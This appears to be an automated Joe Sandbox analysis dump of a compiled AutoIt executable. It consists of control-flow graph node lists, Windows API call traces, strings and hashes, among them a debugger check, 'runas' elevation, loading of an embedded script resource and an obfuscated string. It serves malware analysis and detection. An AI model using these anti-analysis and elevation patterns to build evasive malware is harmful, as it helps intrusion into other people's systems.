565026 95274->95277 95276 4f25b7 CoInitialize 95275->95276 95276->95246 95327 5392d4 53 API calls 95277->95327 95279 56502d 95328 5399f9 CreateThread 95279->95328 95281 565039 CloseHandle 95281->95276 95282->95248 95329 
4f2854 95283->95329 95286 4f6a63 48 API calls 95287 4f234a 95286->95287 95288 4f272e 95287->95288 95343 4f27ec 6 API calls 95288->95343 95290 4f237a 95290->95255 95292 4fd7f7 48 API calls 95291->95292 95293 4f264f 95292->95293 95294 4fd7f7 48 API calls 95293->95294 95295 4f2657 95294->95295 95344 4f26a7 95295->95344 95298 4f26a7 48 API calls 95299 4f2667 95298->95299 95300 4fd7f7 48 API calls 95299->95300 95301 4f2672 95300->95301 95302 50f4ea 48 API calls 95301->95302 95303 4f24cb 95302->95303 95304 4f22a4 95303->95304 95305 4f22b2 95304->95305 95306 4fd7f7 48 API calls 95305->95306 95307 4f22bd 95306->95307 95308 4fd7f7 48 API calls 95307->95308 95309 4f22c8 95308->95309 95310 4fd7f7 48 API calls 95309->95310 95311 4f22d3 95310->95311 95312 4fd7f7 48 API calls 95311->95312 95313 4f22de 95312->95313 95314 4f26a7 48 API calls 95313->95314 95315 4f22e9 95314->95315 95316 50f4ea 48 API calls 95315->95316 95317 4f22f0 95316->95317 95318 561fe7 95317->95318 95319 4f22f9 RegisterWindowMessageW 95317->95319 95319->95268 95321 4f2755 95320->95321 95322 565f4d 95320->95322 95323 50f4ea 48 API calls 95321->95323 95349 53c942 50 API calls 95322->95349 95326 4f275d 95323->95326 95325 565f58 95326->95272 95327->95279 95328->95281 95350 5399df 54 API calls 95328->95350 95336 4f2870 95329->95336 95332 4f2870 48 API calls 95333 4f2864 95332->95333 95334 4fd7f7 48 API calls 95333->95334 95335 4f2716 95334->95335 95335->95286 95337 4fd7f7 48 API calls 95336->95337 95338 4f287b 95337->95338 95339 4fd7f7 48 API calls 95338->95339 95340 4f2883 95339->95340 95341 4fd7f7 48 API calls 95340->95341 95342 4f285c 95341->95342 95342->95332 95343->95290 95345 4fd7f7 48 API calls 95344->95345 95346 4f26b0 95345->95346 95347 4fd7f7 48 API calls 95346->95347 95348 4f265f 95347->95348 95348->95298 95349->95325 95351 568eb8 95355 53a635 95351->95355 95353 568ec3 95354 53a635 84 API calls 95353->95354 95354->95353 95356 53a642 95355->95356 95365 53a66f 95355->95365 95357 53a671 95356->95357 95359 
53a676 95356->95359 95363 53a669 95356->95363 95356->95365 95367 50ec4e 81 API calls 95357->95367 95360 4f936c 81 API calls 95359->95360 95361 53a67d 95360->95361 95362 4f510d 48 API calls 95361->95362 95362->95365 95366 504525 61 API calls _memcpy_s 95363->95366 95365->95353 95366->95365 95367->95359

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 643 51b043-51b080 call 51f8a0 646 51b082-51b084 643->646 647 51b089-51b08b 643->647 648 51b860-51b86c call 51a70c 646->648 649 51b08d-51b0a7 call 517bda call 517c0e call 516e10 647->649 650 51b0ac-51b0d9 647->650 649->648 652 51b0e0-51b0e7 650->652 653 51b0db-51b0de 650->653 658 51b105 652->658 659 51b0e9-51b100 call 517bda call 517c0e call 516e10 652->659 653->652 657 51b10b-51b110 653->657 661 51b112-51b11c call 51f82f 657->661 662 51b11f-51b12d call 523bf2 657->662 658->657 686 51b851-51b854 659->686 661->662 673 51b133-51b145 662->673 674 51b44b-51b45d 662->674 673->674 677 51b14b-51b183 call 517a0d GetConsoleMode 673->677 678 51b463-51b473 674->678 679 51b7b8-51b7d5 WriteFile 674->679 677->674 700 51b189-51b18f 677->700 684 51b479-51b484 678->684 685 51b55a-51b55f 678->685 681 51b7e1-51b7e7 GetLastError 679->681 682 51b7d7-51b7df 679->682 687 51b7e9 681->687 682->687 691 51b81b-51b833 684->691 692 51b48a-51b49a 684->692 688 51b663-51b66e 685->688 689 51b565-51b56e 685->689 699 51b85e-51b85f 686->699 697 51b7ef-51b7f1 687->697 688->691 696 51b674 688->696 689->691 698 51b574 689->698 694 51b835-51b838 691->694 695 51b83e-51b84e call 517c0e call 517bda 691->695 693 51b4a0-51b4a3 692->693 701 51b4a5-51b4be 693->701 702 51b4e9-51b520 WriteFile 693->702 694->695 703 51b83a-51b83c 694->703 695->686 704 51b67e-51b693 696->704 706 51b7f3-51b7f5 697->706 707 51b856-51b85c 697->707 708 51b57e-51b595 698->708 699->648 709 51b191-51b193 700->709 710 51b199-51b1bc GetConsoleCP 700->710 713 51b4c0-51b4ca 701->713 714 51b4cb-51b4e7 701->714 702->681 715 51b526-51b538 702->715 703->699 716 51b699-51b69b 704->716 706->691 718 51b7f7-51b7fc 706->718 707->699 719 51b59b-51b59e 708->719 709->674 709->710 711 51b440-51b446 710->711 712 51b1c2-51b1ca 710->712 711->706 720 51b1d4-51b1d6 712->720 713->714 714->693 714->702 715->697 721 51b53e-51b54f 715->721 722 51b6d8-51b719 
WideCharToMultiByte 716->722 723 51b69d-51b6b3 716->723 725 51b812-51b819 call 517bed 718->725 726 51b7fe-51b810 call 517c0e call 517bda 718->726 727 51b5a0-51b5b6 719->727 728 51b5de-51b627 WriteFile 719->728 731 51b36b-51b36e 720->731 732 51b1dc-51b1fe 720->732 721->692 733 51b555 721->733 722->681 737 51b71f-51b721 722->737 734 51b6b5-51b6c4 723->734 735 51b6c7-51b6d6 723->735 725->686 726->686 739 51b5b8-51b5ca 727->739 740 51b5cd-51b5dc 727->740 728->681 730 51b62d-51b645 728->730 730->697 742 51b64b-51b658 730->742 745 51b370-51b373 731->745 746 51b375-51b3a2 731->746 743 51b200-51b215 732->743 744 51b217-51b223 call 511688 732->744 733->697 734->735 735->716 735->722 747 51b727-51b75a WriteFile 737->747 739->740 740->719 740->728 742->708 749 51b65e 742->749 750 51b271-51b283 call 5240f7 743->750 765 51b225-51b239 744->765 766 51b269-51b26b 744->766 745->746 752 51b3a8-51b3ab 745->752 746->752 753 51b77a-51b78e GetLastError 747->753 754 51b75c-51b776 747->754 749->697 770 51b435-51b43b 750->770 771 51b289 750->771 758 51b3b2-51b3c5 call 525884 752->758 759 51b3ad-51b3b0 752->759 756 51b794-51b796 753->756 754->747 761 51b778 754->761 756->687 764 51b798-51b7b0 756->764 758->681 776 51b3cb-51b3d5 758->776 759->758 767 51b407-51b40a 759->767 761->756 764->704 772 51b7b6 764->772 774 51b412-51b42d 765->774 775 51b23f-51b254 call 5240f7 765->775 766->750 767->720 773 51b410 767->773 770->687 777 51b28f-51b2c4 WideCharToMultiByte 771->777 772->697 773->770 774->770 775->770 785 51b25a-51b267 775->785 779 51b3d7-51b3ee call 525884 776->779 780 51b3fb-51b401 776->780 777->770 781 51b2ca-51b2f0 WriteFile 777->781 779->681 788 51b3f4-51b3f5 779->788 780->767 781->681 784 51b2f6-51b30e 781->784 784->770 787 51b314-51b31b 784->787 785->777 787->780 789 51b321-51b34c WriteFile 787->789 788->780 789->681 790 51b352-51b359 789->790 790->770 791 51b35f-51b366 790->791 791->780
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: db710b156c6dcbca5f38dbdf8cba89ce60afd8a42aecc60cfe17c596b5a5c36c
                                                                                  • Instruction ID: 4f442c4ca6fda0f11ab1e5a076983fbe646b55f7e4069420228ba769e7c917f6
                                                                                  • Opcode Fuzzy Hash: db710b156c6dcbca5f38dbdf8cba89ce60afd8a42aecc60cfe17c596b5a5c36c
                                                                                  • Instruction Fuzzy Hash: 84324C75A022298FEB249F14DC856E9BBB5FF4A310F5841D9E40AE7A91D7309EC0CF52

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,004F3AA3,?), ref: 004F3D45
                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,004F3AA3,?), ref: 004F3D57
                                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,005B1148,005B1130,?,?,?,?,004F3AA3,?), ref: 004F3DC8
                                                                                    • Part of subcall function 004F6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,004F3DEE,005B1148,?,?,?,?,?,004F3AA3,?), ref: 004F6471
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,004F3AA3,?), ref: 004F3E48
                                                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,005A28F4,00000010), ref: 00561CCE
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,005B1148,?,?,?,?,?,004F3AA3,?), ref: 00561D06
                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0058DAB4,005B1148,?,?,?,?,?,004F3AA3,?), ref: 00561D89
                                                                                  • ShellExecuteW.SHELL32(00000000,?,?,?,?,004F3AA3), ref: 00561D90
                                                                                    • Part of subcall function 004F3E6E: GetSysColorBrush.USER32(0000000F), ref: 004F3E79
                                                                                    • Part of subcall function 004F3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 004F3E88
                                                                                    • Part of subcall function 004F3E6E: LoadIconW.USER32(00000063), ref: 004F3E9E
                                                                                    • Part of subcall function 004F3E6E: LoadIconW.USER32(000000A4), ref: 004F3EB0
                                                                                    • Part of subcall function 004F3E6E: LoadIconW.USER32(000000A2), ref: 004F3EC2
                                                                                    • Part of subcall function 004F3E6E: RegisterClassExW.USER32(?), ref: 004F3F30
                                                                                    • Part of subcall function 004F36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004F36E6
                                                                                    • Part of subcall function 004F36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004F3707
                                                                                    • Part of subcall function 004F36B8: ShowWindow.USER32(00000000,?,?,?,?,004F3AA3,?), ref: 004F371B
                                                                                    • Part of subcall function 004F36B8: ShowWindow.USER32(00000000,?,?,?,?,004F3AA3,?), ref: 004F3724
                                                                                    • Part of subcall function 004F4FFC: _memset.LIBCMT ref: 004F5022
                                                                                    • Part of subcall function 004F4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004F50CB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                  • String ID: ()Z$This is a third-party compiled AutoIt script.$runas
                                                                                  • API String ID: 438480954-3942923355
                                                                                  • Opcode ID: 83e40942890f5a689db88c7085eb066821408325f4f4cfc31a1f0f442ae5025c
                                                                                  • Instruction ID: 479cecd80ab7d32af071947a147c0e7a0cab7b27f7bb52e15ce5c7fdf4377898
                                                                                  • Opcode Fuzzy Hash: 83e40942890f5a689db88c7085eb066821408325f4f4cfc31a1f0f442ae5025c
                                                                                  • Instruction Fuzzy Hash: 9A512830D0464CBACB11ABB9EC56DFE7F79AF15704F00416AF30162192CA286649EB39

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetVersionExW.KERNEL32(?), ref: 0050DDEC
                                                                                  • GetCurrentProcess.KERNEL32(00000000,0058DC38,?,?), ref: 0050DEAC
                                                                                  • GetNativeSystemInfo.KERNELBASE(?,0058DC38,?,?), ref: 0050DF01
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0050DF0C
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0050DF1F
                                                                                  • GetSystemInfo.KERNEL32(?,0058DC38,?,?), ref: 0050DF29
                                                                                  • GetSystemInfo.KERNEL32(?,0058DC38,?,?), ref: 0050DF35
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                  • String ID:
                                                                                  • API String ID: 3851250370-0
                                                                                  • Opcode ID: a04f615bb0916a307c2392f4d42e39a1fb98a230623f63f8bcc19ae996014c9f
                                                                                  • Instruction ID: c6636218cf7bc156d9c43fcfb3c8458604e6b629492fd861188605ddb12e5b0d
                                                                                  • Opcode Fuzzy Hash: a04f615bb0916a307c2392f4d42e39a1fb98a230623f63f8bcc19ae996014c9f
                                                                                  • Instruction Fuzzy Hash: 296180B180A384DBCF15CFA898C15EDBFB47F29300F1989D9D8499F247D624C949CB69

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,004F449E,?,?,00000000,00000001), ref: 004F407B
                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,004F449E,?,?,00000000,00000001), ref: 004F4092
                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,004F449E,?,?,00000000,00000001,?,?,?,?,?,?,004F41FB), ref: 00564F1A
                                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,004F449E,?,?,00000000,00000001,?,?,?,?,?,?,004F41FB), ref: 00564F2F
                                                                                  • LockResource.KERNEL32(004F449E,?,?,004F449E,?,?,00000000,00000001,?,?,?,?,?,?,004F41FB,00000000), ref: 00564F42
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                  • String ID: SCRIPT
                                                                                  • API String ID: 3051347437-3967369404
                                                                                  • Opcode ID: 96797d384f1e64d7e053a16656059b0924e4197b6b436e798cd27f033075105f
                                                                                  • Instruction ID: 430a52cfe9f85f19290f38909a95a533072e64d857adac193ca2c39553ba8bd8
                                                                                  • Opcode Fuzzy Hash: 96797d384f1e64d7e053a16656059b0924e4197b6b436e798cd27f033075105f
                                                                                  • Instruction Fuzzy Hash: 93115774200705AFEB218B25EC48F277BB9EFC5B51F20812DF606962A0DF75EC45AA31
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00562F49), ref: 00536CB9
                                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 00536CCA
                                                                                  • FindClose.KERNEL32(00000000), ref: 00536CDA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                                  • String ID:
                                                                                  • API String ID: 48322524-0
                                                                                  • Opcode ID: 177fb551c7920ec7596a9433f194f529c2d8ca112a9b71ed4bbf872bb4b00d71
                                                                                  • Instruction ID: 15cec0b9cb397ba82952918d8575fcf410ac45313eff4e418d90992779730e66
                                                                                  • Opcode Fuzzy Hash: 177fb551c7920ec7596a9433f194f529c2d8ca112a9b71ed4bbf872bb4b00d71
                                                                                  • Instruction Fuzzy Hash: 77E012718155156782106738AC098E97B7CEE1533AF504719F575C21D0E760DD44A5A5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper
                                                                                  • String ID: [
                                                                                  • API String ID: 3964851224-2366388290
                                                                                  • Opcode ID: a5252afabd837f793dbe1081eec4bb311907d936d5514cf8c983b0dd0f5b4ac2
                                                                                  • Instruction ID: 91b41ff66dbfd0a0898a80fbc39528730fc69b38dc72a80ff3aa8f846ec9756c
                                                                                  • Opcode Fuzzy Hash: a5252afabd837f793dbe1081eec4bb311907d936d5514cf8c983b0dd0f5b4ac2
                                                                                  • Instruction Fuzzy Hash: 3C927A706083419FD724DF18C484B6ABBE9BF88308F14885DE99A8B3A2D775ED45CB52
                                                                                  APIs
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004FE959
                                                                                  • timeGetTime.WINMM ref: 004FEBFA
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004FED2E
                                                                                  • TranslateMessage.USER32(?), ref: 004FED3F
                                                                                  • DispatchMessageW.USER32(?), ref: 004FED4A
                                                                                  • LockWindowUpdate.USER32(00000000), ref: 004FED79
                                                                                  • DestroyWindow.USER32 ref: 004FED85
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004FED9F
                                                                                  • Sleep.KERNEL32(0000000A), ref: 00565270
                                                                                  • TranslateMessage.USER32(?), ref: 005659F7
                                                                                  • DispatchMessageW.USER32(?), ref: 00565A05
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00565A19
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                  • API String ID: 2641332412-570651680
                                                                                  • Opcode ID: 2b5b1e2f8880e2181079341187ee9634070c7c406de2c4f95502b288bebdcbeb
                                                                                  • Instruction ID: 633fe391c0ee1b3cdf9a14d58a5b7e769070d5543b08277da6ac0e9d75ddb236
                                                                                  • Opcode Fuzzy Hash: 2b5b1e2f8880e2181079341187ee9634070c7c406de2c4f95502b288bebdcbeb
                                                                                  • Instruction Fuzzy Hash: EC62F870504345DFDB20DF25C895BBA7BE4BF54304F14096EFA468B2A2DB74E848CB66
                                                                                  APIs
                                                                                  • ___createFile.LIBCMT ref: 00525EC3
                                                                                  • ___createFile.LIBCMT ref: 00525F04
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00525F2D
                                                                                  • __dosmaperr.LIBCMT ref: 00525F34
                                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00525F47
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00525F6A
                                                                                  • __dosmaperr.LIBCMT ref: 00525F73
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00525F7C
                                                                                  • __set_osfhnd.LIBCMT ref: 00525FAC
                                                                                  • __lseeki64_nolock.LIBCMT ref: 00526016
                                                                                  • __close_nolock.LIBCMT ref: 0052603C
                                                                                  • __chsize_nolock.LIBCMT ref: 0052606C
                                                                                  • __lseeki64_nolock.LIBCMT ref: 0052607E
                                                                                  • __lseeki64_nolock.LIBCMT ref: 00526176
                                                                                  • __lseeki64_nolock.LIBCMT ref: 0052618B
                                                                                  • __close_nolock.LIBCMT ref: 005261EB
                                                                                    • Part of subcall function 0051EA9C: CloseHandle.KERNELBASE(00000000,0059EEF4,00000000,?,00526041,0059EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0051EAEC
                                                                                    • Part of subcall function 0051EA9C: GetLastError.KERNEL32(?,00526041,0059EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0051EAF6
                                                                                    • Part of subcall function 0051EA9C: __free_osfhnd.LIBCMT ref: 0051EB03
                                                                                    • Part of subcall function 0051EA9C: __dosmaperr.LIBCMT ref: 0051EB25
                                                                                    • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
                                                                                  • __lseeki64_nolock.LIBCMT ref: 0052620D
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00526342
                                                                                  • ___createFile.LIBCMT ref: 00526361
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0052636E
                                                                                  • __dosmaperr.LIBCMT ref: 00526375
                                                                                  • __free_osfhnd.LIBCMT ref: 00526395
                                                                                  • __invoke_watson.LIBCMT ref: 005263C3
                                                                                  • __wsopen_helper.LIBCMT ref: 005263DD
                                                                                  Strings
                                                                                  • vv9aqg50vv9aqg50vv9aqg50vv9aqg50vv9aqg56vv9aqg56vv9aqg58vv9aqg59vv9aqg54vv9aqg55vv9aqg5evv9aqg50vv9aqg5bvv9aqg59vv9aqg56vv9aqg55vv, xrefs: 00525E31
                                                                                  • @, xrefs: 00525F98
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                  • String ID: @$vv9aqg50vv9aqg50vv9aqg50vv9aqg50vv9aqg56vv9aqg56vv9aqg58vv9aqg59vv9aqg54vv9aqg55vv9aqg5evv9aqg50vv9aqg5bvv9aqg59vv9aqg56vv9aqg55vv
                                                                                  • API String ID: 3896587723-2129363465
                                                                                  • Opcode ID: 61e262346ef896f09f8b780762d2d8adb6786a54b62f00b93b8481096666c415
                                                                                  • Instruction ID: 5aaeae16c87c9eb4b8c6006543faf02c66309c7c35e023a8fb403efd1b146060
                                                                                  • Opcode Fuzzy Hash: 61e262346ef896f09f8b780762d2d8adb6786a54b62f00b93b8481096666c415
                                                                                  • Instruction Fuzzy Hash: B122567190062A9FEB298F68EC497ED7F31FF16314F244628E9119B2D1E2358E90DB91

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • _wcscpy.LIBCMT ref: 0053FA96
                                                                                  • _wcschr.LIBCMT ref: 0053FAA4
                                                                                  • _wcscpy.LIBCMT ref: 0053FABB
                                                                                  • _wcscat.LIBCMT ref: 0053FACA
                                                                                  • _wcscat.LIBCMT ref: 0053FAE8
                                                                                  • _wcscpy.LIBCMT ref: 0053FB09
                                                                                  • __wsplitpath.LIBCMT ref: 0053FBE6
                                                                                  • _wcscpy.LIBCMT ref: 0053FC0B
                                                                                  • _wcscpy.LIBCMT ref: 0053FC1D
                                                                                  • _wcscpy.LIBCMT ref: 0053FC32
                                                                                  • _wcscat.LIBCMT ref: 0053FC47
                                                                                  • _wcscat.LIBCMT ref: 0053FC59
                                                                                  • _wcscat.LIBCMT ref: 0053FC6E
                                                                                    • Part of subcall function 0053BFA4: _wcscmp.LIBCMT ref: 0053C03E
                                                                                    • Part of subcall function 0053BFA4: __wsplitpath.LIBCMT ref: 0053C083
                                                                                    • Part of subcall function 0053BFA4: _wcscpy.LIBCMT ref: 0053C096
                                                                                    • Part of subcall function 0053BFA4: _wcscat.LIBCMT ref: 0053C0A9
                                                                                    • Part of subcall function 0053BFA4: __wsplitpath.LIBCMT ref: 0053C0CE
                                                                                    • Part of subcall function 0053BFA4: _wcscat.LIBCMT ref: 0053C0E4
                                                                                    • Part of subcall function 0053BFA4: _wcscat.LIBCMT ref: 0053C0F7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
